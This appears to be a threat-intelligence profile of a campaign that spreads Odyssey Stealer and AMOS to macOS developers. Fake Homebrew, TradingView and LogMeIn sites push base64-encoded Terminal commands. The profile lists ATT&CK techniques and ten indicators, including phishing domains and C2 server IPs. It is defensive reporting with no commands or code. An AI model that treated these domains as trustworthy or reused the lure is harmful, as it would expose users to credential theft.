Odyssey Stealer and AMOS Campaign Targets macOS Developers

Free, Unbiased, and Open threat intelligence

Odyssey Stealer and AMOS Campaign Targets macOS Developers

threat Profile

HIGH

Description

A coordinated campaign targeting macOS users, particularly developers, through fake software download websites impersonating trusted platforms like Homebrew, TradingView, and LogMeIn. The campaign uses social engineering tactics to deliver Odyssey Stealer and AMOS (Atomic macOS Stealer) malware through base64-encoded commands executed in Terminal.

MITRE ATT&CK Techniques

T1204.002 - User Execution: Malicious File T1027 - Obfuscated Files or Information T1548.003 - Abuse Elevation Control Mechanism: Sudo T1497 - Virtualization/Sandbox Evasion T1055 - Process Injection T1059.002 - Command and Scripting Interpreter: AppleScript T1059.004 - Command and Scripting Interpreter: Unix Shell T1071.001 - Application Layer Protocol: Web Protocols T1583.001 - Acquire Infrastructure: Domains T1608.001 - Stage Capabilities: Upload Malware T1566.002 - Phishing: Spearphishing Link T1082 - System Information Discovery T1518 - Software Discovery T1543 - Create or Modify System Process T1562.001 - Impair Defenses: Disable or Modify Tools

Related Entities

Malware

AMOS (Atomic macOS Stealer) Odyssey Stealer

Indicators of Compromise (10)

sites-phantom.com

Phishing infrastructure domain

homebrewclubs.org

Phishing domain impersonating Homebrew package manager

homebrewfaq.org

Phishing domain impersonating Homebrew package manager

45.146.130.132

Odyssey Stealer C2 server

45.135.232.33

Odyssey Stealer C2 server

45.146.130.131

Odyssey Stealer C2 server

bonoud.com

Payload hosting domain serving installer scripts

88.214.50.3

Odyssey Stealer C2 server

93.152.230.79

Primary C2 infrastructure server hosting phishing pages and payloads

logmeln.com

Phishing domain impersonating LogMeIn

Metadata

Published

7 months ago

Views